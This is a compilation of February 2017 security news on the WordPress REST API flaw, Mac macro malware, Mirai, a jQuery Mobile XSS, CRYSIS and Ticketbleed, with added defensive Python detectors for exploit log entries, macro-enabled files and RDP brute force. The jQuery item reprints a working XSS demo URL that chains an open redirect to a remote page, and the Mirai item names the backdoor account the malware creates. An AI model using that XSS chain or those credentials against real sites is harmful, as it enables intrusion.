The networking giant obtained the Umbrella technology when it acquired OpenDNS in 2015. The company said the new product combines the original technology with machine learning models designed for uncovering threats and blocking malicious connections on the DNS and IP layers, Cisco Talos threat intelligence, and Advanced Malware Protection (AMP) technology for detecting and blocking malicious files in the cloud.


With Umbrella, Cisco promises enhanced visibility and control, including for sensitive data in SaaS applications via Cloudlock technology, and intelligence from the more than 100 billion requests resolved every day.

Cisco said the cloud-based SIG provides reliable and fast connectivity, and it can be easily integrated with existing appliances, intelligence platforms and custom tools.

“Umbrella was built upon the OpenDNS platform, a platform that has been delivered from the cloud since its inception. Then we integrated technology from across the Cisco security portfolio, including capabilities from the Cloud Web Security proxy, and the Advanced Malware Protection (AMP) file inspection,” said Brian Roddy, who oversees Cisco’s Cloud Security Business. “These technologies haven’t just been stitched together, but re-engineered to be delivered within Umbrella, so that they’re easy to use and able to deliver even more effective security.”


WordPress Flaw Exploited for Remote Code Execution

10.2.2017 securityweek Exploit
A recently patched WordPress vulnerability has been used to deface roughly 1.5 million web pages and experts have also started seeing attempts to exploit the flaw for remote code execution.

The flaw in question was patched on January 26 with the release of WordPress 4.7.2, but its existence was only disclosed one week later in an effort to give users enough time to update their installations.

The security hole affects the REST API and has been described as a privilege escalation and content injection vulnerability. It allows attackers to modify the content of any post or page and, in combination with certain plugins, it can be leveraged for arbitrary PHP code execution.

Despite WordPress developers giving users a week to update their installations and working with service providers to block exploitation attempts, many websites that don’t have automatic updating enabled are still vulnerable to attacks.

A majority of the attacks spotted so far are part of defacement campaigns conducted by script kiddies looking to boost their online reputation. In the first days after exploits were made public, Sucuri researchers observed four campaigns in which more than 60,000 pages had been defaced.

The number has increased significantly and WordPress security firm WordFence reported on Thursday that it had spotted roughly 1.5 million defaced pages in attacks carried out by 20 different hackers.


WordFence pointed out that none of these hackers had managed to deface too many websites at once before the disclosure of this WordPress vulnerability. Several exploits have been used in the recent attacks and, in some cases, the attackers had found ways to bypass the rules deployed by firewall vendors.

While defacement attacks are not easy to monetize, researchers at Sucuri have started seeing other types of operations involving the REST API flaw.

The vulnerability cannot be directly used for code execution. However, WordPress plugins that allow users to insert PHP code directly into posts can be combined with the flaw to achieve this. Sucuri has seen exploitation attempts against websites that have plugins such as Insert PHP and Exec-PHP, both of which have over 100,000 active installs.
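As an added detection example, not taken from Sucuri or WordFence, the Python below scans web-server access logs for write requests to the REST posts endpoint whose `id` query parameter is non-numeric or disagrees with the id in the route. That signature mirrors the publicly reported exploit pattern for this flaw, which the article itself does not describe, so treat it as an assumption to validate against your own traffic. The log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b'
)
# Pretty permalinks (/wp-json/wp/v2/posts/<id>) and the ?rest_route=/wp/v2/posts/<id> form.
ROUTE_RE = re.compile(r"^(?:/index\.php)?(?:/wp-json)?/wp/v2/posts/(?P<path_id>\d+)/?$")
WRITE_METHODS = {"POST", "PUT", "PATCH"}


def classify(line):
    """Return a finding dict for a suspicious REST write to a post, or None."""
    m = LOG_RE.match(line)
    if not m or m["method"] not in WRITE_METHODS:
        return None
    parts = urlsplit(m["target"])
    query = parse_qs(parts.query)

    route = ROUTE_RE.match(parts.path)
    if route is None and "rest_route" in query:
        route = ROUTE_RE.match(query["rest_route"][0])
    if route is None:
        return None                      # not the posts endpoint
    path_id = route["path_id"]

    query_id = query.get("id", [None])[0]
    if query_id is None:
        return None                      # normal editor traffic: the id lives only in the path
    # Signature (an assumption, see the lead-in): an `id` in the query string that is not a
    # plain integer, or that disagrees with the id in the route.
    if not query_id.isdigit() or query_id != path_id:
        return {"ip": m["ip"], "time": m["ts"], "method": m["method"],
                "path_id": path_id, "query_id": query_id, "status": m["status"]}
    return None


def scan(lines):
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2017:10:12:01 +0000] "POST /wp-json/wp/v2/posts/123?id=123abc HTTP/1.1" 200 512 "-" "python-requests/2.12.4"',
    '198.51.100.7 - - [06/Feb/2017:10:13:44 +0000] "POST /index.php?rest_route=/wp/v2/posts/45&id=45xyz HTTP/1.1" 200 498 "-" "curl/7.51.0"',
    '192.0.2.9 - - [06/Feb/2017:10:14:02 +0000] "GET /wp-json/wp/v2/posts/123 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [06/Feb/2017:10:15:30 +0000] "POST /wp-json/wp/v2/posts/123 HTTP/1.1" 200 611 "https://blog.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.5 - - [06/Feb/2017:10:16:12 +0000] "POST /wp-json/wp/v2/posts/7?id=8 HTTP/1.1" 403 120 "-" "python-requests/2.12.4"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("%(time)s %(ip)s %(method)s post %(path_id)s with id=%(query_id)s -> %(status)s" % hit)
```

A 200 response on a flagged line means the write went through and the post should be diffed against a known-good copy; a 403 only shows that a WAF rule fired on that variant, not that the site is patched. Checking the WordPress version against 4.7.2 remains the authoritative test.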

“Defacements don’t offer economic returns, so that will likely die soon,” explained Daniel Cid, founder and CTO of Sucuri. “What will remain are attempts to execute commands (RCE) as it gives the attackers full control of a site – and offers multiple ways to monetize – and SPAM SEO / affiliate link / ad injections. We are starting to see them being attempted on a few sites, and that will likely be the direction this vulnerability will be misused in the coming days, weeks and possibly months.”


Arby’s Restaurant Group confirmed a massive card breach hit its stores
10.2.2017 securityaffairs Incident

Arby's Restaurant Group, one of the largest fast food sandwich restaurant chains in the US, confirmed that its PoS systems had been breached by crooks.
Hundreds of Arby's restaurants suffered a card breach. Arby's Restaurant Group is the second-largest quick-service sandwich restaurant chain in the US, with more than 3,330 stores in the United States, one-third of which are directly owned by the company.

Brian Krebs first learned about the card breach from his sources in the financial industry; representatives of the group later confirmed the incident to him. Arby's discovered the security breach in mid-January, when it was alerted by industry partners.

“Sources at nearly a half-dozen banks and credit unions independently reached out over the past 48 hours to inquire if I’d heard anything about a data breach at Arby’s fast-food restaurants. Asked about the rumors, Arby’s told KrebsOnSecurity that it recently remediated a breach involving malicious software installed on payment card systems at hundreds of its restaurant locations nationwide.” wrote Brian Krebs

Why was the incident disclosed only now?

According to the company, the card breach is being publicly disclosed only now at the explicit request of the FBI.

“A spokesperson for Atlanta, Ga.-based Arby’s said the company was first notified by industry partners in mid-January about a breach at some stores, but that it had not gone public about the incident at the request of the FBI.” continues Krebs.

“Arby’s Restaurant Group, Inc. (ARG) was recently provided with information that prompted it to launch an investigation of its payment card systems,” the company said in a written statement provided to KrebsOnSecurity.

“Upon learning of the incident, ARG immediately notified law enforcement and enlisted the expertise of leading security experts, including Mandiant,” their statement continued. “While the investigation is ongoing, ARG quickly took measures to contain this incident and eradicate the malware from systems at restaurants that were impacted.”

The company hired Mandiant and other security experts to sanitize its systems and investigate the card breach. At the time of writing, the company had confirmed that the systems have been cleaned up.

“Although there are over 1,000 corporate Arby’s restaurants, not all of the corporate restaurants were affected,” said Christopher Fuller, Arby’s senior vice president of communications. “But this is the most important point: That we have fully contained and eradicated the malware that was on our point-of-sale systems.”

Crooks used malware to compromise PoS systems at Arby's restaurants; it is not yet clear how many payment cards may have been affected.

Krebs is aware of an alert from PSCU, a credit union service organization, warning that more than 355,000 credit and debit cards issued by its members were compromised in a card breach at a major fast food restaurant chain.

PSCU dated the card breach to the period between October 25, 2016 and January 19, 2017.

In July 2016, another major fast food restaurant chain suffered a card breach: Wendy's determined that roughly 1,000 of its restaurants had been breached by cybercriminals.


DDoS attacks reach a new peak

10.2.2017 SecurityWorld Cyber attack
DDoS attacks developed considerably in the last three months of 2016. The new trend is attacks launched through large botnets built from vulnerable Internet of Things (IoT) devices.

According to a Kaspersky Lab report, analysts recorded botnet-driven DDoS attacks in 80 countries during the last quarter of the year, up from 67 in the previous quarter.

The top ten countries with the most DDoS victims changed: Italy and the Netherlands were replaced by Germany and Canada. Three Western European countries (the Netherlands, the United Kingdom and France) remained, for the second quarter in a row, among the top ten countries hosting the most C&C servers, joined in the last quarter by Bulgaria and Japan.

The longest DDoS attack of the quarter lasted 292 hours (more than 12 days), making it the record holder for 2016. The highest number of DDoS attacks in a single day fell on Saturday, 5 November.

Overall, the last three months of 2016 were marked by unusual DDoS attacks against a variety of targets, including companies such as Dyn (a DNS provider), Deutsche Telekom and several large Russian banks.

These companies became the first victims of a new trend: DDoS attacks launched through large botnets made up of vulnerable IoT devices. Mirai is the prime example. The approach taken by Mirai's authors has served as the basis for many other botnets built from infected IoT devices.

The growing number of attacks involving IoT devices was only one of the quarter's trends. Over the three months there was a marked decline in the number of amplification DDoS attacks, which had been widely used in the first half of the year. The reason may be better protection against such attacks and fewer vulnerable servers for cybercriminals to abuse.

The gap left by amplification attacks was quickly filled by application-layer attacks, such as WordPress pingback attacks. Detecting application-layer attacks is a far more complex process, because the attack mimics the activity of real users.

The threat is all the greater because these attacks increasingly use encryption. That significantly raises the effectiveness of DDoS attacks, because the need to decrypt the traffic greatly complicates filtering malicious requests from genuine ones.


Watch Out! First-Ever Word Macro Malware for Apple Mac OS Discovered in the Wild
10.2.2017 thehackernews Apple

After targeting Windows-based computers over the past few years, hackers are now shifting their interest to Macs as well.
The emergence of the first macro-based Word document attack against Apple's macOS platform is the latest example to prove this.
The concept of macros dates back to the 1990s. You might be familiar with the message that reads: "Warning: This document contains macros."
A macro is a series of commands and actions that help automate tasks. Microsoft Office programs support macros written in Visual Basic for Applications (VBA), but macros can also be used for malicious activities such as installing malware.
Until now, hackers had been using this technique to target Windows.
Security researchers have now detected the first in-the-wild instance of hackers using malicious macros in Word documents to install malware on Mac computers and steal data, an old Windows technique.
The attack tricks victims into opening infected Word documents that then run malicious macros. One such malicious Word file discovered by the researchers was titled "U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace.docm."
However, when a Mac user opens the malicious Word document, Word prompts them to enable macros before any macro runs.
Denying permission stops the attack; but if macros are enabled despite the warning, the embedded macro executes a Python function that downloads the malware payload, which lets attackers monitor the webcam, access browser history, and steal passwords and encryption keys.
According to a blog post published this week by Patrick Wardle, director of research at security firm Synack, the Python function is virtually identical to EmPyre, an open source Mac and Linux post-exploitation agent.
"It’s kind of a low-tech solution, but on one hand it’s abusing legitimate functionality so it’s not going to crash like a memory corruption or overflow might, and it’s not going to be patched out," said Wardle.
Wardle traced the IP address from which the malicious Word documents were served to Russia; that IP has previously been associated with malicious activity such as phishing attacks.
Another attack discovered by researchers this week also relied on a standard Windows technique: prompting users to download and install a fake software update that actually harvests the user's Keychain, phishes usernames and passwords, and steals other sensitive data.
The MacDownloader malware presented itself as either an Adobe Flash update or the Bitdefender Adware Removal Tool, prompts that most users find annoying and dismiss.
This is exactly what the attackers want. Whether the user clicks to reject the update or presses yes to dismiss it once and for all, the malware gets the green light to harvest the user's Keychain, phish usernames and passwords, collect other private and sensitive data, and send everything back to the attackers.
Researchers observed this macOS malware targeting mostly the defense industry, and it is reported to have been used against a human rights advocate.
The best way to avoid these kinds of attacks is to deny permission to enable macros when opening a suspicious Word document, and to avoid downloading software from third-party app stores or untrusted websites.
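Whether a Word attachment can run a macro at all is decided by what is inside the file, not by its icon. A .docm (like .docx) is a ZIP container; the VBA code lives in word/vbaProject.bin and the package declares itself macro-enabled in [Content_Types].xml. The following triage check is an added example written for this page (it is not code from Wardle's post or from Microsoft); build_sample() constructs a minimal fake container in memory so the check runs offline, and the vbaProject.bin it writes is just an OLE header stub, not real macro code.

```python
"""Triage check: does an Office Open XML document carry a VBA project?
Added example for this page; the containers it inspects here are constructed."""
import io
import zipfile

# Content type Word assigns to the main part of a macro-enabled document (.docm).
MACRO_ENABLED_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_DOCX_TYPE = "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"


def inspect_docx(data: bytes) -> dict:
    """Report the macro indicators found in an OOXML document given as bytes.

    Two independent signals are checked, because an attacker controls both:
    - a VBA project part (word/vbaProject.bin) is present in the ZIP
    - the main part is declared with the macro-enabled content type
    """
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        content_types = ""
        if "[Content_Types].xml" in names:
            content_types = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    vba_parts = sorted(n for n in names if n.lower().endswith("vbaproject.bin"))
    return {
        "has_vba_project": bool(vba_parts),
        "vba_parts": vba_parts,
        "declared_macro_enabled": MACRO_ENABLED_TYPE in content_types,
    }


def build_sample(with_macro: bool) -> bytes:
    """Construct a minimal OOXML-like ZIP for demonstration (not a real document)."""
    main_type = MACRO_ENABLED_TYPE if with_macro else PLAIN_DOCX_TYPE
    content_types = (
        '<?xml version="1.0"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_type}"/>'
        "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # OLE compound-file magic followed by padding: a stand-in for a real VBA project.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print(flag, inspect_docx(build_sample(flag)))
```

If either indicator is set, treat the attachment as executable content rather than as a document; to actually read the macro source (the module streams are stored compressed), run it through a VBA extractor such as oletools' olevba before deciding it is benign.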


New Windows Trojan Spreads MIRAI Malware To Hack More IoT Devices
10.2.2017 thehackernews Virus

MIRAI, possibly the biggest IoT-based malware threat to emerge last year, caused a vast internet outage in October 2016 by launching massive distributed denial-of-service (DDoS) attacks against the popular DNS provider Dyn.
Now the infamous malware has been updated to boost its distribution efforts.
Researchers from Russian cyber-security firm Dr.Web have uncovered a Windows Trojan built with the sole purpose of helping attackers spread Mirai to even more devices.
Mirai is malware for Linux-based internet-of-things (IoT) devices: it scans for insecure IoT devices, enslaves them into a botnet and uses them to launch DDoS attacks, spreading over Telnet with factory-default device credentials.
It all started in early October last year, when a hacker publicly released the source code of Mirai.
Dubbed Trojan.Mirai.1, the new Trojan targets Windows computers and scans the victim's network for Linux-based connected devices it can compromise.
Once installed on a Windows computer, the Trojan connects to a command-and-control (C&C) server from which it downloads a configuration file containing a range of IP addresses; it then attempts authentication against them over several ports: 22 (SSH), 23 (Telnet), 135, 445, 1433, 3306 and 3389.
Successful authentication lets the malware run the commands specified in the configuration file, depending on the type of compromised system.
In the case of Linux systems accessed via Telnet, the Trojan downloads a binary file onto the compromised device, which then downloads and launches Linux.Mirai.
"Trojan.Mirai.1's Scanner can check several TCP ports simultaneously. If the Trojan successfully connects to the attacked node via any of the available protocols, it executes the indicated sequence of commands," claimed the company in an advisory published this week.
Once a Windows host is compromised, the Trojan can spread itself to other Windows devices, helping hackers hijack even more machines.
In addition, the researchers noted that the malware can also identify and compromise database services running on various ports, including MySQL and Microsoft SQL Server, creating a new administrative account "phpminds" with the password "phpgodwith" that allows the attackers to steal the database.
It is not known who created this Trojan, but its design shows that IoT devices that are not directly reachable from the internet can also be hacked and enlisted in the Mirai botnet army.


Every website that uses jQuery Mobile, and has any open redirect is vulnerable to XSS
10.2.2017 securityaffairs Mobile

Every website that uses jQuery Mobile and has an open redirect anywhere is vulnerable to cross-site scripting (XSS) attacks.
The jQuery Foundation’s jQuery Mobile project is an HTML5-based framework that lets developers design a single responsive website or application that works on all popular mobile devices and desktop systems.

According to the foundation, jQuery Mobile is currently used on more than 150,000 active websites. Google security engineer Eduardo Vela discovered that the framework can expose websites to cross-site scripting (XSS) attacks when they are also affected by an open redirect vulnerability.

A few months ago, while searching for CSP bypasses, Vela noticed an interesting behaviour in jQuery Mobile: it fetches any URL found in location.hash and places the response in innerHTML, which an attacker can exploit under specific conditions. "I thought that was pretty weird, so decided to see if it was vulnerable to XSS," he wrote.

Vela summarized the behaviour in three steps:

jQuery Mobile checks if you have anything in location.hash.
If your location.hash looks like a URL, it will try to set history.pushState on it, then it will do an XMLHttpRequest to it.
Then it will just innerHTML the response.
The expert explained that history.pushState should prevent XSS, because the browser refuses to push a cross-origin URL; the XMLHttpRequest that follows, however, honours HTTP redirects, so a same-origin URL that redirects elsewhere lets an attacker-controlled response reach innerHTML. The flaw is therefore exploitable whenever the website also has an open redirect.

Below the demo provided by Vela:

http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html

According to the expert, many websites are likely vulnerable to such attacks because many organizations do not consider open redirects to be security vulnerabilities; such issues are present on major websites such as Google, YouTube, Facebook, Baidu and Yahoo.

Now the bad news!

Vela reported the flaw to the jQuery Mobile development team, but it will likely not be fixed because of the potential impact of a fix on existing applications. The development team acknowledged that their users should be warned about the risk.

“The jQuery Mobile team explained that they consider the Open Redirect to be the vulnerability, and not their behavior of fetching and inlining, and that they wouldn’t want to make a change because that might break existing applications. This means that there won’t be a patch as far as I have been informed. The jQuery mobile team suggests to 403 all requests made from XHR that might result in a redirect.” wrote Vela.

“This means that every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to XSS.“

Vela is inviting other researchers to try to trigger the same XSS without an open redirect; he tried himself, without success.

“One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn’t work out,” added Vela.

“In my experience, Open Redirects are very common, and they are also a common source of bugs. Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs”


CRYSIS Ransomware is back and crooks are using RDP attacks once again
10.2.2017 securityaffairs Virus

CRYSIS ransomware attacks leveraging brute force via the Remote Desktop Protocol (RDP) are still ongoing, mostly targeting US firms in the healthcare sector.
Do you remember the CRYSIS ransomware? It appeared in the threat landscape last year, and researchers at Trend Micro have now found it being distributed through Remote Desktop Protocol (RDP) brute-force attacks.

The malware was spread with the same technique in September 2016, when crooks targeted businesses in Australia and New Zealand. Now the cybercriminals are targeting organizations across the world.

Trend Micro observed a significant increase in the number of CRYSIS ransomware infections in January 2017 compared with the previous months. The latest wave of attacks mostly targeted US organizations in the healthcare industry.

“In fact, the volume of these attacks doubled in January 2017 from a comparable period in late 2016. While a wide variety of sectors have been affected, the most consistent target has been the healthcare sector in the United States.” states the blog post published by Trend Micro.

CRYSIS ransomware

The researchers believe that behind the two campaigns there are the same threat actors.

“We believe that the same group of attackers is behind the earlier attacks and the current campaign. The file names being used are consistent within each region. Other parts of this attack—such as where the malicious files are dropped onto the compromised machine—are also consistent.” continues the report.

The attackers transferred the malware from their own machine through a folder shared into the RDP session and, in some cases, via the clipboard.

Both techniques expose the local resources of the attacker to the remote machine, and vice versa.

The researchers observed multiple login attempts with commonly used credentials; once the attackers had determined the correct username and password, they usually came back several times within a short period trying to infect the endpoint.

“In one particular case, we saw CRYSIS deployed six times (packed different ways) on an endpoint within a span of 10 minutes. When we went over the files that were copied, they were created at various times during a 30-day period starting from the time of the first compromise attempt. The attackers had multiple files at their disposal, and they were experimenting with various payloads until they found something that worked well.” states the report.

Trend Micro suggests that organizations apply proper security settings in Remote Desktop Services, for example disabling access to shared drives and the clipboard, which makes it impossible for attackers to copy malicious payloads over RDP.

The experts also suggest carefully monitoring logs to identify the attackers' IP addresses.
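The pattern Trend Micro describes (a burst of guesses with common usernames, then a successful RDP logon from the same address, then repeated returns) is visible in the Windows Security log as event 4625 (failed logon) followed by 4624 (successful logon), both with logon type 10 (RemoteInteractive). The detection below is an added example written for this page, not Trend Micro's tooling; the events are constructed here as dicts carrying only the fields the rule needs, so it runs offline against the inline sample and would need a small adapter in front of a real EVTX or SIEM export.

```python
"""Flag RDP password-guessing runs that end in a successful logon.
Added detection example; SAMPLE_EVENTS is constructed, not a real log."""
from collections import defaultdict
from datetime import datetime, timedelta

RDP_LOGON_TYPE = 10  # RemoteInteractive
EVT_FAILED, EVT_SUCCESS = 4625, 4624

# Constructed sample (chronological): one guessing run that succeeds, one user typo.
SAMPLE_EVENTS = [
    {"time": "2017-01-20T02:11:03", "EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.45", "TargetUserName": "administrator"},
    {"time": "2017-01-20T02:11:04", "EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.45", "TargetUserName": "admin"},
    {"time": "2017-01-20T02:11:05", "EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.45", "TargetUserName": "administrator"},
    {"time": "2017-01-20T02:11:06", "EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.45", "TargetUserName": "scanner"},
    {"time": "2017-01-20T02:11:07", "EventID": 4625, "LogonType": 10, "IpAddress": "203.0.113.45", "TargetUserName": "administrator"},
    {"time": "2017-01-20T02:11:09", "EventID": 4624, "LogonType": 10, "IpAddress": "203.0.113.45", "TargetUserName": "administrator"},
    {"time": "2017-01-20T09:00:00", "EventID": 4625, "LogonType": 10, "IpAddress": "10.0.0.12", "TargetUserName": "jdoe"},
    {"time": "2017-01-20T09:00:20", "EventID": 4624, "LogonType": 10, "IpAddress": "10.0.0.12", "TargetUserName": "jdoe"},
]


def detect_rdp_bruteforce(events, min_failures=5, window=timedelta(minutes=30)):
    """Return one finding per RDP success that was preceded, from the same source IP,
    by at least `min_failures` RDP failures inside `window`.

    Only logon type 10 is considered, so console and network logons do not add noise.
    """
    failures = defaultdict(list)  # source ip -> [(time, username tried)]
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["LogonType"] != RDP_LOGON_TYPE:
            continue
        t = datetime.fromisoformat(ev["time"])
        ip = ev["IpAddress"]
        if ev["EventID"] == EVT_FAILED:
            failures[ip].append((t, ev["TargetUserName"]))
        elif ev["EventID"] == EVT_SUCCESS:
            recent = [(ft, u) for ft, u in failures[ip] if t - ft <= window]
            if len(recent) >= min_failures:
                findings.append({
                    "src_ip": ip,
                    "failures_before_success": len(recent),
                    "usernames_tried": sorted({u for _, u in recent}),
                    "compromised_account": ev["TargetUserName"],
                    "success_time": ev["time"],
                })
            failures[ip].clear()  # a success closes the run for this source
    return findings


if __name__ == "__main__":
    for f in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(f)
```

The finding names the source address to block and the account whose password was guessed, which is what the incident responder needs first; the threshold and window are deliberately parameters, since a quiet attacker spreading guesses over hours needs a longer window than the ten-minute bursts described above.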


Ticketbleed flaw in F5 Networks BIG-IP appliances exposed to remote attacks

9.2.2017 securityaffairs Attack

F5 Networks BIG-IP appliances are affected by a serious vulnerability, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’, that exposes them to remote attacks.
The F5 Networks BIG-IP appliances are affected by a serious flaw, tracked as CVE-2016-9244 and dubbed ‘Ticketbleed’, that can be exploited by a remote attacker to extract memory contents, including sensitive data such as SSL session IDs.

The list of F5 BIG-IP products affected by the flaw includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM.

The CVE-2016-9244 vulnerability was discovered by the well-known security expert Filippo Valsorda and his colleagues at Cloudflare while investigating a bug report from one of their customers.

“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” said Valsorda.

“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory.”

The group reported the issue to F5 in late October; the vendor confirmed that the issue affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled.

“A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.” reads the security advisory published by F5.

Ticketbleed is reminiscent of the dangerous Heartbleed flaw in the OpenSSL library; however, unlike Heartbleed, Ticketbleed exposes only 31 bytes of memory per request instead of 64 KB.

Ticketbleed is clearly less efficient than Heartbleed, because extracting a useful amount of memory requires many more rounds, and it affects only F5 products. An Internet scan nonetheless showed that hundreds of hosts were exposed by the flaw.


As a workaround, the company suggests disabling the Session Tickets option on the vulnerable Client SSL profile; this can be done from the Configuration utility under Local Traffic > Profiles > SSL > Client.

Filippo Valsorda has developed a free online tool that can be used to check whether a server is affected by Ticketbleed.

Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.

Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.


ENISA Threat Landscape Report 2016, who is attacking us, and how?
9.2.2017 securityaffairs Attack

ENISA has issued the annual ENISA Threat Landscape Report 2016, a document that synthesizes the emerging trends in cyber security
The European Union Agency for Network and Information Security (ENISA) is an EU agency composed of security experts who work with EU member states, public organizations and private groups to develop advice and recommendations on good practice in information security.

I’m very proud to be a member of the group that annually publishes this interesting report, which summarizes the top cyber threats identified during the last 12 months.

The new report, titled ENISA Threat Landscape Report 2016, analyzes the huge number of cyber-incidents that made the headlines in 2016, focusing on threat actors and their TTPs (Tactics, techniques, and procedures).

The document is composed of the following sections:

“Cyber Threat Intelligence and ETL” provides an overview of recent developments in cyber-threat intelligence, positions the ETL and summarizes some cyber-threat intelligence issues that are seen as emerging.
“Top Cyber-Threats” provides the results of the yearly threat assessment for the top 15 cyber-threats.
“Threat Agents” is an overview of threat actors.
“Attack Vectors”
“Conclusions” and some policy, business and research recommendations.
“ETL 2016 is streamlined towards the top cyber-threats, providing information on threat agents and attack vectors including all the remarkable developments, trends and issues. Moreover, it reports about threat agents their motivations, and how their practices, tools and techniques have advanced.” reads the introduction to the report.

The ENISA Threat Landscape Report 2016 is an impressive source of data and references to the events that characterized the threat landscape in 2016.

The vast majority of attacks were financially and politically motivated; 2016 is thus characterized by “the efficiency of cyber-crime monetization.” Crooks monetized their efforts not only through the illegal activities they conducted directly but also by offering their services through the consolidated “crime-as-a-service” model.

Fortunately, we are observing an increasing maturity of defenders in dealing with cyber threats, and a successful effort by international law enforcement agencies, which conducted many operations disrupting criminal organizations.

However, as the report explains, attackers are still one step ahead. Despite the advances of defenders, attackers have demonstrated their superiority in:

Abusing unsecured components to mobilize a very large attack potential, a capacity demonstrated by DDoS attacks launched from infected IoT devices.
Successfully launching extortion attacks that have targeted commercial organisations and have achieved very high levels of ransom and high rates of paying victims.
Demonstrating the very big impact of multi-layered attacks aimed at affecting the outcome of democratic processes, as in the example of the US elections.
Operating large malicious infrastructures that are managed efficiently and resiliently to withstand takedowns and allow for quick development and multi-tenancy.
Malware remains the principal cyber-threat in 2016: the number of samples reached ca. 600 million per quarter, and mobile malware (growing by ca. 150%) and ransomware have monopolized the threat landscape. Web-based attacks and web application attacks follow malware in the Top 15, with no change observed with respect to 2015.
Web based attacks include malicious URLs, compromised domains, browser exploits and drive-by attacks.

“Web based attacks are those that use web components as an attack surface. As web components we understand parts of the web infrastructure, such as web servers, web clients (browsers) content management systems (CMS) and browser extensions” states the report.

The category of web application attacks includes classic techniques such as cross-site scripting and SQL injection (SQLi), which continue to be favoured attack vectors for threat actors. Botnets, the infrastructure behind a large number of cyber attacks, also rank high in the list.

DDoS attacks reached fourth place, a result of extortion activities and of the availability in the criminal underground of DDoS-for-hire services that offer wannabe hackers everything needed to launch a powerful attack.


The report also provides an interesting analysis of the top threat actors observed in 2016. Cyber-criminals, insiders, cyber spies, hacktivists, cyber fighters, cyber terrorists and script kiddies operate with different techniques, but in many cases an overlap of their TTPs was observed, caused by the evolution of the crime-as-a-service model.

The ENISA Threat Landscape Report 2016 also maps the various threats to the above threat agents, an interesting exercise that allows us to better profile the attackers.


Based on the material ENISA’s experts collected, the report provides conclusions for policy makers, businesses and research.

Prof. Udo Helmbrecht, Executive Director of ENISA, commented on the project: “As we speak, the cyber-threat landscape is receiving significant high-level attention: it is on the agenda of politicians in the biggest industrial countries. This is a direct consequence of ‘cyber’ becoming mainstream, in affecting people’s opinions and influencing the political environment of modern societies. Besides this, a lot of developments have taken place regarding the tools and tactics used by adversaries, making 2016 another striking sample of the dynamics of cyber-space. ETL 2016 reflects these developments, while providing strategic information about the cyber-threats and their technical evolution during 2016.”

I consider the ENISA Threat Landscape Report 2016 a must-read for security experts in every industry and executives in any sector. I won’t tell you more; enjoy it.

The ETL report and related material can be found under the following links:

ETL 2016
Thematic Landscape Hardware
Thematic Landscape Ad-hoc and sensor networking for M2M communications
ENISA Threat Taxonomy


Researchers at Dr Web spotted a Windows version of the Mirai bot
9.2.2017 securityaffairs Virus

Researchers at the antivirus firm Dr.Web discovered a new strain of the Mirai bot, a Windows variant, targeting more ports.
Security experts at the antivirus firm Dr.Web discovered a new strain of the Mirai bot: a Windows version of the popular IoT malware that targets more ports.

The Windows version of the Mirai bot was being used by criminals to spread the Mirai Linux malware to IoT devices, which are then used to carry out DDoS attacks.

“One of the recent developments on the Mirai malware front was discovered by Russian cyber-security firm Dr.Web, whose experts came across a Windows trojan built with the sole purpose of helping Mirai spread to even more devices,” wrote BleepingComputer.com.

The Mirai malware was spotted by the researcher MalwareMustDie in August 2016, it was specifically designed to target IoT devices.


It infected thousands of routers and IoT devices, including DVRs and CCTV systems. When the Mirai bot infects a device, it picks random IP addresses and attempts to log in over Telnet and SSH using a list of default administrative credentials.

